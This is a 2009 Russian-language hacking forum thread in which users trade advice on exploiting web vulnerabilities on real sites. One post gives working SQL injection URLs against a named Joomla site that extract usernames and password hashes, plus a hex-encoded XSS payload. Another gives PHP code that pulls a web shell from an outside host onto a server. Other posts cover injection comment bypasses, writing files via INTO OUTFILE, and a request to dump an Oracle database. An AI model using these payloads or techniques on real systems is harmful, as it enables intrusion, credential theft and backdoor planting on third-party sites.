Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    а вот нифига я и не прав, твой сайт у меня не открываеться,приведу пример на другом,
    судя по всему слеш добавляеться после, уязвимый запрос наверно идет в стату судя по возврашаемой ошибке(убераем слеши):

    то есть например вот так можно вставить в стату пароль и хеш пользователя:

    PHP:
    http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=(select/**/concat_ws(0x3A,username,password)/**/from/**/gmm_users/**/limit/**/1)/**/WHERE/**/userid/**/LIKE/**/'%%'/*
    или javascript

    PHP:
    http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=0x27223e3c7363726970743e616c657274282727293c2f7363726970743e/**/WHERE/**/userid/**/LIKE/**/'%%'/*
    правдо я хз как оно там дальше выводиться в стате, может скрипты режуться.
     
    #5681 AkyHa_MaTaTa, 3 Mar 2009
    Last edited: 3 Mar 2009
    1 person likes this.
  2. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Хеши не тут расшифровывать..

    sss113
     
    1 person likes this.
  3. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Assembler, тебе сюда! http://forum.antichat.ru/forum76.html
     
    1 person likes this.
  4. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    еще один вопрос)
    конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки)
    как я понимаю просто такого ид не существует?
    select+top+1+start+at+2+login+from+user ругается на
    где то был топик на эту тему но ответа так и не увидел.
    какие еще есть варианты вывести другие записи?)
     
  5. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)

    up. чуть подкоректировал чтобы было легче понимать :)
     
    1 person likes this.
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Ух блин... Это скуля? Какие колонки выводятся?
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Насколько я понял тебя:
    if($_GET['get_shell']=='yes')
    copy('http://malicos.ru/shell.txt','/путь/имя_шелла');
    /*
    file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt'));
    и т.п. и т.п.

    */
     
    1 person likes this.
  8. mozarat

    mozarat New Member

    Joined:
    10 Feb 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Вопрос может не совсем в тему...
    Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Плагин к фалерфоксу, - LiveHTTP Headers
     
  10. VIP

    VIP Elder - Старейшина

    Joined:
    29 Dec 2004
    Messages:
    104
    Likes Received:
    3
    Reputations:
    0
    вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю
     
  11. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    ну это можно посмотреть глянув в "html код" страницы...
    Ну или
    скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....
     
  12. user777

    user777 New Member

    Joined:
    25 Feb 2009
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Перекопал много ресурсов но так никто и не ответил.
    Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле.
    Имеется связка логин\пасс для программ работающих с базой.
    Как? Чем? Что еще нужно?
     
  13. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    ММ, сомневаусь что это инклюд, так как файл с изображением не должен подключаться к php коду(не ну возможно и такое).Скорее всего там идет либо копирование этого файла на хост, либо он просто читаеться, а потом передаеться функции для работы с изображением.
     
    #5693 AkyHa_MaTaTa, 4 Mar 2009
    Last edited: 4 Mar 2009
  14. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Есть скуль, на любой запрос реагирует

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

    Пробывал и /**/ и разнообразные альтернативные варианты,окончание sql запроса так же пробывал разнообразные, всё равно такой же результат.
    Подзапросы так же не работают.
    Например id=211+or+substring(version(),1,1)=5-- плюётся ашыбкой

    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or substring(version(),1,1)=5--' at line 1

    Не могу даже подобрать кол-во полей.
    В чём может быть проблема и как обойти?
     
  15. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Попробуй с кавычкой - id=-1' ..., если пробовал и не помогло - облом, скули нет.
     
    1 person likes this.
  16. Imperou$

    Imperou$ Elder - Старейшина

    Joined:
    23 May 2008
    Messages:
    90
    Likes Received:
    42
    Reputations:
    0
    Видимо облом.С кавычкой то же самое...
     
  17. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Imperou$ Линк давай посмотрим, что-то мне кажется, что ты просто что-то не так делаешь, а скуль всё-же есть.

    Не хочешь в паблик, можешь мне в ПМ кинуть
     
    #5697 Kakoytoxaker, 4 Mar 2009
    Last edited: 4 Mar 2009
    1 person likes this.
  18. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Imperou$, а может проблемы в обозначении коментария -- ?

    попробуй
    Code:
    /*
    Code:
    #
    Code:
    +--+
    Code:
    --+
    Code:
    +--
    и т д...
     
    1 person likes this.
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    -m0rgan- всё уже решили, там лимит.

    Кстати, не пояснишь зачем вот такие комментарии?
    "+--" ,"+--+"
    Синтаксис мускула требует хотя-бы один пробел ПОСЛЕ -- . Всё остальное извраты :)
     
    3 people like this.
  20. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Доброго всем времени суток, у меня такой вопрос:
    Если какой то способ обхода слеширования кавычек или какой то способ не использовать кавычки при указания адресса записываемого файла при INTO DUMPFILE, INTO OUTFILE - %27 и указание в хексе(ну мало ли :)) адресса не проходит, возможно ли это как то обойти?
     
Thread Status:
Not open for further replies.